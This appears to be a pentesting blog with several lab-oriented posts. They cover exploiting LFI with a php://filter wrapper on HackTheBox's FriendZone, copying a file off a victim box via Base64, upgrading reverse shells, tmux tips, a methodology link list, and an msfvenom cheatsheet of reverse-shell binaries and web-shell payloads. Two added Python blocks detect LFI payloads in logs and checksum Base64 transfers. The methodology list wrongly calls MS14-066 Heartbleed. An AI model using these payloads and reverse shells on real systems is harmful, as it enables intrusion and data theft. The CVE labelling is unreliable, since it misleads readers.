Tips & Tricks, WebApp 101

Using PHP Wrappers within LFI to Obtain PHP Script Source Code

When you find a Local File Inclusion (LFI) in a PHP application, you can leverage a PHP wrapper to have the target file returned Base64-encoded instead of executed; decode it on your own machine to read the page's source code.

In this example, we’ll be using FRIENDZONE on HackTheBox.


Confirming LFI on our example

At the following URL, we found that we have LFI capabilities via the ?pagename parameter:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login

If we adjust ?pagename to the name of a PHP page that exists on the box, it will display that page beneath the “Something wen worng” text. For example, let’s view the contents of a PHP page named timestamp.php:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp


Using Base64 Encoding to View Source Code

We can use the following PHP wrapper to have a file returned Base64-encoded. Because the file is encoded rather than interpreted, the server returns its PHP source instead of executing it:

php://filter/convert.base64-encode/resource=<filename>

Let’s inject that into our LFI and specify the file whose contents we want to view (login.php):
https://administrator1.friendzone.red/dashboard.php?image_id=z.gif&pagename=php://filter/convert.base64-encode/resource=login

Now, copy the returned Base64 and run the following command in Kali:

echo -n <Base64> | base64 -d

The result is the source code of login.php! Append > login.php to the above command to save a copy as your own file.


That’s it! Super simple.
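From the defender's side, the same technique is easy to spot in web-server logs: the pagename parameter suddenly carries a php:// stream wrapper or a ../ sequence. The following is an added example (not code from the original post) that scans Apache combined-format access-log lines for wrapper and traversal payloads, URL-decoding the parameter values first; the log lines are constructed samples modelled on the requests above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache "combined" format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=login HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /dashboard.php?image_id=z.gif&pagename=php://filter/convert.base64-encode/resource=login HTTP/1.1" 200 6410 "-" "curl/7.68.0"
10.0.0.9 - - [10/Oct/2023:13:56:20 +0000] "GET /dashboard.php?pagename=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2201 "-" "curl/7.68.0"
10.0.0.9 - - [10/Oct/2023:13:57:02 +0000] "GET /dashboard.php?pagename=PHP%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dconfig HTTP/1.1" 200 880 "-" "curl/7.68.0"
"""

# Pulls client IP, request target and status out of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# PHP stream wrappers that have no business in a page-name parameter.
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|glob)://", re.IGNORECASE)
# A ".." path segment, with either slash style.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def decode_param(value, rounds=2):
    """URL-decode repeatedly so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(text):
    """Return (ip, status, param, decoded_value, reason) for each suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = decode_param(raw)
            if WRAPPER_RE.search(value):
                reason = "stream-wrapper"
            elif TRAVERSAL_RE.search(value):
                reason = "path-traversal"
            else:
                continue
            # A 200 on a wrapper request means the source was most likely served.
            findings.append((m.group("ip"), int(m.group("status")), name, value, reason))
    return findings
```

A 200 status paired with a stream-wrapper finding is the case worth alerting on, since it indicates the include succeeded and source was disclosed.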

Tips & Tricks

Transferring Files via Base64

Depending on the size of the file, you may not want to go through the hassle of transferring it via Netcat, FTP, or some other file transfer method.

In some cases, you can convert a file to Base64 code, and then simply copy/paste the code between the machines.


We’ll do that here. There is a file named viewuser on our victim box that we want to copy to our Kali attacking machine. I already have an SSH connection to the victim box. Let’s start by converting the file to Base64:

base64 -w0 /usr/bin/viewuser

Note: -w0 disables line wrapping, so the output is a single line that is easy to copy.

We’ll highlight the code and then Copy Selection.

With that in our clipboard, head over to your Kali machine and create a file called viewuser.b64:

gedit viewuser.b64

Paste the code and Save the file.

Now just run the following command to decode the contents and write them to a new file:

base64 -d viewuser.b64 > viewuser

That’s it! You’ve successfully transferred the file between machines.
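A copy/paste transfer has no integrity check, and a paste that picks up line wraps or loses its tail produces a silently corrupt binary. As an added example (not from the original post), here is a small pack/unpack pair in Python that prepends a SHA-256 line to the Base64 text, strips any whitespace introduced while pasting, and refuses to write a file whose checksum does not match; width=0 corresponds to the -w0 behaviour above.

```python
import base64
import binascii
import hashlib


def pack(data: bytes, width: int = 0) -> str:
    """Base64-encode data with a leading sha256 line.

    width=0 mirrors `base64 -w0` (single line); a positive width wraps
    the text, as a default `base64` invocation would.
    """
    digest = hashlib.sha256(data).hexdigest()
    b64 = base64.b64encode(data).decode("ascii")
    if width > 0:
        b64 = "\n".join(b64[i:i + width] for i in range(0, len(b64), width))
    return f"sha256:{digest}\n{b64}\n"


def unpack(text: str) -> bytes:
    """Decode a pack() bundle and verify its checksum.

    Whitespace and line breaks picked up during copy/paste are dropped;
    a truncated or altered paste raises ValueError instead of silently
    producing a corrupt file.
    """
    header, _, body = text.strip().partition("\n")
    if not header.startswith("sha256:"):
        raise ValueError("missing sha256 header line")
    expected = header[len("sha256:"):]
    compact = "".join(body.split())
    try:
        data = base64.b64decode(compact, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"Base64 is damaged or truncated: {exc}") from exc
    actual = hashlib.sha256(data).hexdigest()
    if actual != expected:
        raise ValueError(f"checksum mismatch: expected {expected}, got {actual}")
    return data


def transfer_ok(data: bytes, width: int = 76) -> bool:
    """Round-trip through a wrapped bundle, as a pasted terminal would hold it."""
    return unpack(pack(data, width)) == data
```

On the receiving side, compare the header line against sha256sum of the original file if you want an independent check; any mismatch means the paste, not the file, is at fault.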

Tips & Tricks

Upgrading Simple Shells to Interactive TTYs w/ Python

This is a quick and easy post, mainly for my own reference moving forward. It will showcase how to upgrade and improve your reverse shells so that they are more user friendly.


Once you have a reverse shell, start by running the command:

python -c 'import pty;pty.spawn("/bin/bash")'

Now background the shell with Ctrl + Z. You’ll be returned to your Kali terminal window.

In the Kali terminal, type stty raw -echo. It will appear as though nothing happened; then type fg. Note: the text you type here will not be displayed.

Press Enter. This will re-display the command you ran to catch the shell; press Enter a second time and you will be back in your reverse shell.

Now, you can run export TERM=xterm, which will allow you to do things like clear the screen.


Fixing Rows/Columns

If you need to run vi, you may find that your shell doesn’t display the editor correctly. For example, it may not fill out the entire terminal window (see image below).

To fix this, we need to set the correct number of rows and columns. From a new terminal window (on your local machine), run the following command:

stty -a

Make note of the returned rows and columns. Back in your shell, run the following command to configure the terminal with the same number of rows and columns:

stty rows <rows> columns <columns>

Now running vi will work correctly.

Tips & Tricks

Tmux Cheatsheet for Splitting Terminal Panes and More

Note: <PrefixKey> by default is Ctrl + B


Creating Tmux Sessions and Windows

tmux new -s Example               Create a new tmux session titled “Example”
<PrefixKey> + C                   Create a new window within the session
<PrefixKey> + <Number>            Switch to that window. Windows are identified in the banner at the bottom.
<PrefixKey> + ,                   Rename the current window
<PrefixKey> + D                   Detach your tmux session from the terminal window
tmux attach-session -t Example    Reattach to the session titled “Example”

Window Splitting

<PrefixKey> + %                       Vertical split
<PrefixKey> + "                       Horizontal split
<PrefixKey> + <ArrowKey>              Move between your panes
<PrefixKey> + Z                       Zoom the selected pane to fill the window. Press it a second time to zoom out.
<PrefixKey> + Ctrl + <ArrowKey>       Resize the pane (hold Ctrl while pressing the arrow key)
<PrefixKey> + {                       Move the pane to the left
<PrefixKey> + }                       Move the pane to the right
<PrefixKey> + <Space>                 Cycle through the preset pane layouts

Helpful Command Line Tricks

Ctrl + A                  Go to the beginning of the line
Ctrl + E                  Go to the end of the line
Ctrl + <ArrowKey>         Move word by word along the line
Alt + .                   Insert the last word of the previous command at the cursor position
Ctrl + R                  Reverse-search incrementally through your command history

Navigating the Terminal

<PrefixKey> + [           Enter Edit Mode (tmux’s copy mode)

While in Edit Mode:
q                         Exit Edit Mode
Ctrl + <ArrowKey>         Scroll
<ArrowKey>                Move around the terminal window

Pentesting, Tips & Tricks

Hacking Methodology Cheatsheet

This post contains a list of common tools, vulnerabilities, and methodology tactics broken down by category, with links to references that showcase examples. It will be updated often as I work through more resources.


Enumerating Common Services

Enumerating SMB 139,445

  • Using smbmap and smbclient to crawl and browse shares. Example of this in HTB FriendZone – Link to Ippsec video.

Enumerating LDAP 389


External Tools/Methodology

Using Hydra to Brute-Force Websites

Using ASP/ASPX Webshells

Enumerating Tomcat

Enumerating HTTP Proxies

Connecting to/Abusing IRC

Performing Zone Transfers


Local/Remote File Inclusion (LFI & RFI)

  • Using PHP Wrappers within LFI to Obtain PHP Script Source Code — My post
  • XML Entity Injection (XXE) Vuln for LFI. HackTheBox: DevOops. – Link to Ippsec Video

Privilege Escalation Techniques/Tools

Privilege Escalation: Using Sherlock

Privilege Escalation: Using Windows-Exploit-Suggester


Pivoting & Utilizing Proxies

Routing Tools Through Proxies


Common Vulnerabilities

Exploiting MS17-010 (EternalBlue)

  • HackTheBox: Blue

Exploiting MS14-066 (Heartbleed)

Exploiting CVE-2016-5195 (DirtyCow)


Common Active Directory Attacks

Abusing LLMNR/NBT-NS w/ Responder

Abusing IPv6

Utilizing CrackMapExec

Tips & Tricks

Unzipping Rockyou.txt.gz in Kali Linux


Stupid simple post. Creating this as I never remember the syntax and have to look it up each time I spin up a new VM. Posting the command here for my own personal gain in the future.

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz


Tips & Tricks

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)


There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes non-Meterpreter shells. I will include both Meterpreter, as well as non-Meterpreter shells for those studying for OSCP.

Table of Contents:
– Non Meterpreter Binaries
– Non Meterpreter Web Payloads
– Meterpreter Binaries
– Meterpreter Web Payloads


Non-Meterpreter Binaries

Staged Payloads for Windows

x86: msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64: msfvenom -p windows/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

x86: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

x86: msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

x86: msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Non-Meterpreter Web Payloads

asp: msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jsp: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
war: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
php: msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Meterpreter Binaries

Staged Payloads for Windows

x86: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

x86: msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64: msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

x86: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

x86: msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Meterpreter Web Payloads

asp: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jsp: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
war: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
php: msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
